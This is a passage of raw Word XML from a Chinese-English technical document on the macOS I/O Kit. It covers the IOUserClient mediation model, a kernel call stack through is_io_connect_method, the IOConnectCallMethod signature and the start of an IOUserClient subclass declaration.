    <w:p w:rsidR="00F85D30" w:rsidRDefault="00F85D30" w:rsidP="00C446EC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O Kit Architecture</w:t>
      </w:r>
      <w:r w:rsidR="00C446EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D24B08" w:rsidRPr="00D24B08" w:rsidRDefault="00D24B08" w:rsidP="00D24B08"/>
    <w:p w:rsidR="00EE2828" w:rsidRDefault="00B90B8A" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc445313297"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>External Methods</w:t>
      </w:r>
      <w:r w:rsidR="00F56FDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w:rsidR="0094256D" w:rsidRDefault="00BE716B" w:rsidP="0094256D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00787949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Application-IOUserClient-Driver</w:t>
      </w:r>
      <w:r w:rsidR="0094256D" w:rsidRPr="00787949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094256D" w:rsidRDefault="0094256D" w:rsidP="0094256D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E565866" wp14:editId="218A022B">
            <wp:extent cx="409575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750" cy="3105150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094256D" w:rsidRDefault="0094256D" w:rsidP="0094256D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Application-IOUserClient-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Driver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094256D" w:rsidRDefault="0094256D" w:rsidP="0094256D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOKit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>框架并不会让会应用程序直接与驱动程序连接，而是需要引用一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOUserClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>作为媒介，其原因是因为应用程序与驱动程序并非一对一的关系，驱动程序可能需要同时为多个应用提供服务，而应用程序也可以同时与多个驱动对象交互，所以每一个连接就需要一个对象来进行维护，而这个工作就是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOUserClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>来完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>大多情况下你会根据需求编写子类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>，这与面向对象编程的低耦合思想是相符的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FDC" w:rsidRDefault="009C2FDC" w:rsidP="0094256D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C2FDC" w:rsidRDefault="009C2FDC" w:rsidP="0094256D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C2FDC" w:rsidRDefault="009C2FDC" w:rsidP="009C2FDC">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4681FF8A" wp14:editId="04353BC2">
            <wp:extent cx="5274310" cy="1825253"/>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825253"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FDC" w:rsidRDefault="009C2FDC" w:rsidP="009C2FDC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FDC">
        <w:t>The classes involved in communicating with a serial port from a user space application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56FDB" w:rsidRPr="00787949" w:rsidRDefault="00EE649E" w:rsidP="00F56FDB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00787949">
        <w:lastRenderedPageBreak/>
        <w:t>IOConnectCallMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00787949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE716B" w:rsidRPr="00787949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787949" w:rsidRPr="00787949" w:rsidRDefault="00787949" w:rsidP="00787949">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kernel call stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787949" w:rsidRPr="00787949" w:rsidRDefault="00787949" w:rsidP="00787949"/>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thread #2: tid = 0x1957, 0xffffff8017ff4e67 kernel.development`Debugger(message=&lt;unavailable&gt;) + 759 at model_dep.c:1013, name = '0xffffff80216df4d0', queue = '0x0', stop reason = signal SIGSTOP</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 frame #0: 0xffffff8017ff4e67 kernel.development`Debugger(message=&lt;unavailable&gt;) + 759 at model_dep.c:1013</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1: 0xffffff8017ee4ed1 kernel.development`panic(str=&lt;unavailable&gt;) + 209 at debug.c:383</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2: 0xffffff801843bac2 kernel.development`OSMetaClass::serialize(this=&lt;unavailable&gt;, s=&lt;unavailable&gt;) const + 18 at OSMetaClass.cpp:1144</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3: 0xffffff7f9913e388</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4: 0xffffff7f9916759e</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5: 0xffffff80184b860e kernel.development`</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE716B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOCommandGate::runAction</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE716B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(this=0xffffff80200e7800, inAction=0x00000000e00002d7, arg0=0xffffff801e40a500, arg1=0x0000000000000000, arg2=0x0000000000000000, arg3=0x0000000000000000)(OSObject*, void*, void*, void*, void*), void*, void*, void*, void*) + 462 at IOCommandGate.cpp:190</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6: 0xffffff7f99167245</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7: 0xffffff80184e2133 kernel.development`</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE716B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_io_connect_method</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE716B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(connection=0xffffff801e1a9200, selector=0, scalar_input=&lt;unavailable&gt;, scalar_inputCnt=&lt;unavailable&gt;, inband_input=&lt;unavailable&gt;, inband_inputCnt=&lt;unavailable&gt;, ool_input=&lt;unavailable&gt;, ool_input_size=&lt;unavailable&gt;, inband_output=&lt;unavailable&gt;, inband_outputCnt=&lt;unavailable&gt;, scalar_output=&lt;unavailable&gt;, scalar_outputCnt=&lt;unavailable&gt;, ool_output=&lt;unavailable&gt;, ool_output_size=&lt;unavailable&gt;) + 499 at IOUserClient.cpp:3489</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8: 0xffffff8017fb7f27 kernel.development`_Xio_connect_method(InHeadP=0xffffff801e1a9200, OutHeadP=0xffffff80230bc5d0) + 391 at device_server.c:8249</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9: 0xffffff8017ee92ac kernel.development`ipc_kobject_server(request=0xffffff801e23ac00) + 252 at ipc_kobject.c:338</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10: 0xffffff8017ec5a23 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=3, send_timeout=0) + 275 at ipc_kmsg.c:1430</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #11: 0xffffff8017eddc8d kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 205 at mach_msg.c:487</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE716B" w:rsidRPr="00BE716B" w:rsidRDefault="00BE716B" w:rsidP="00BE716B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE716B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #12: 0xffffff8017fda78a kernel.development`mach_call_munger64(state=0xffffff8022aea4c0) + 442 at bsd_i386.c:542</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56FDB" w:rsidRDefault="00BE716B" w:rsidP="00BE716B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="290"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE716B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>frame #13: 0xffffff801800e666 kernel.development`hndl_mach_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE716B" w:rsidRPr="00787949" w:rsidRDefault="00787949" w:rsidP="00787949">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IOConnectCallMethod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE716B" w:rsidRPr="00787949" w:rsidRDefault="00BE716B" w:rsidP="00787949">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0000FF" w:themeColor="hyperlink"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56FDB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\IOKitUser-1050.1.21\IOKitLib.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56FDB" w:rsidRDefault="00F56FDB" w:rsidP="00F56FDB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kern_return_t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56FDB" w:rsidRDefault="00F56FDB" w:rsidP="00F56FDB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOConnectCallMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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mach_port_t  connection</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uint32_t     selector</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const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uint64_t  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inpu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uint32_t     inputCn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const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inputStruc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size_t       inputStructCn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uint64_t    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outpu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Out</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uint32_t    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outputCn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Out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56FDB" w:rsidRDefault="00F56FDB" w:rsidP="00F56FDB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outputStruct</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Out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56FDB" w:rsidRDefault="00F56FDB" w:rsidP="00F56FDB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    size_t      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outputStructCntP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// In/Out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56FDB" w:rsidRDefault="006A53ED" w:rsidP="006A53ED">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOUserClient-</w:t>
      </w:r>
      <w:r>
        <w:t>IOConnectCallMethod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A53ED" w:rsidRPr="006A53ED" w:rsidRDefault="006A53ED" w:rsidP="006A53ED">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>class com_osxkernel_driver_IOKitTestUserClient : public IOUserClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    OSDeclareAbstractStructors(com_osxkernel_driver_IOKitTestUserClient)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>private:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>保存对应用程序的引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    task_t m_task;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>保存对驱动程序的引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    com_osxkernel_driver_IOKitTest *m_driver;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>public:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>由驱动程序调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
